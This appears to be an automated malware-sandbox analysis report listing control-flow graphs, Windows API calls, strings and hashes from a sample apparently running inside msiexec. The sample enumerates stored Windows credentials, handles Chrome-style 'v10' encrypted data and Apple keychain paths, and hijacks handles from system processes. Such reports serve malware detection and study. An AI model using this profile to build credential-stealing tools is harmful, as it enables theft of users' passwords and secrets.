                                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                      • API String ID: 708747863-3398334509
                                                                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 649 413edb-413ee2 646->649 647->649 655 413ee4 649->655 656 413ee7-413efe 649->656 663 413ea2-413eae CloseHandle 651->663 653 413e61-413e68 652->653 654 413e37-413e44 GetModuleHandleW 652->654 653->651 660 413e6a-413e76 653->660 654->653 659 413e46-413e5c GetProcAddress 654->659 655->656 656->639 659->653 660->651 663->642
                                                                      APIs
                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                      • memset.MSVCRT ref: 00413D7F
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                      • memset.MSVCRT ref: 00413E07
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                      • free.MSVCRT ref: 00413EC1
                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                      • API String ID: 1344430650-1740548384
                                                                      • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                      • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                      APIs
                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                      • String ID:
                                                                      • API String ID: 3473537107-0
                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                      APIs
                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                      • free.MSVCRT ref: 00418803
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                      • String ID:
                                                                      • API String ID: 1355100292-0
                                                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$FirstNext
                                                                      • String ID:
                                                                      • API String ID: 1690352074-0
                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0041898C
                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: InfoSystemmemset
                                                                      • String ID:
                                                                      • API String ID: 3558857096-0
                                                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004455C2
                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                      • memset.MSVCRT ref: 0044570D
                                                                      • memset.MSVCRT ref: 00445725
                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                      • memset.MSVCRT ref: 0044573D
                                                                      • memset.MSVCRT ref: 00445755
                                                                      • memset.MSVCRT ref: 004458CB
                                                                      • memset.MSVCRT ref: 004458E3
                                                                      • memset.MSVCRT ref: 0044596E
                                                                      • memset.MSVCRT ref: 00445A10
                                                                      • memset.MSVCRT ref: 00445A28
                                                                      • memset.MSVCRT ref: 00445AC6
                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                      • memset.MSVCRT ref: 00445B52
                                                                      • memset.MSVCRT ref: 00445B6A
                                                                      • memset.MSVCRT ref: 00445C9B
                                                                      • memset.MSVCRT ref: 00445CB3
                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                      • memset.MSVCRT ref: 00445B82
                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                      • memset.MSVCRT ref: 00445986
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                      • API String ID: 2263259095-3798722523
                                                                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                      • API String ID: 2744995895-28296030
                                                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040B71C
                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                      • memset.MSVCRT ref: 0040B756
                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                      • memset.MSVCRT ref: 0040B851
                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                      • memset.MSVCRT ref: 0040BB53
                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                      • String ID: chp$v10
                                                                      • API String ID: 4290143792-2783969131
                                                                      • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                      • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f free 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                      APIs
                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                      • free.MSVCRT ref: 0040E49A
                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                      • memset.MSVCRT ref: 0040E380
                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                      • API String ID: 3849927982-2252543386
                                                                      • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                      • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
